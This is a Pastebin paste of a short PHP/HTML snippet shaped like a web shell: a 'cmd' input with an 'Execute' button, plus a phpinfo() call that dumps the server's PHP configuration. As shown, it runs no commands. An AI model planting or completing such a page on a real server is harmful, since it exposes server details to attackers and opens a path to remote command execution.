Advertisement
Guest User

Untitled

a guest
May 19th, 2019
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.30 KB | None | 0 0
  1. <html>
  2. <body>
  3. <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  4. <input type="TEXT" name="cmd" id="cmd" size="80">
  5. <input type="SUBMIT" value="Execute">
  6. </form>
  7. <pre>
  8. <?php
  9. phpinfo()
  10. ?>
  11. </pre>
  12. </body>
  13. <script>document.getElementById("cmd").focus();</script>
  14. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement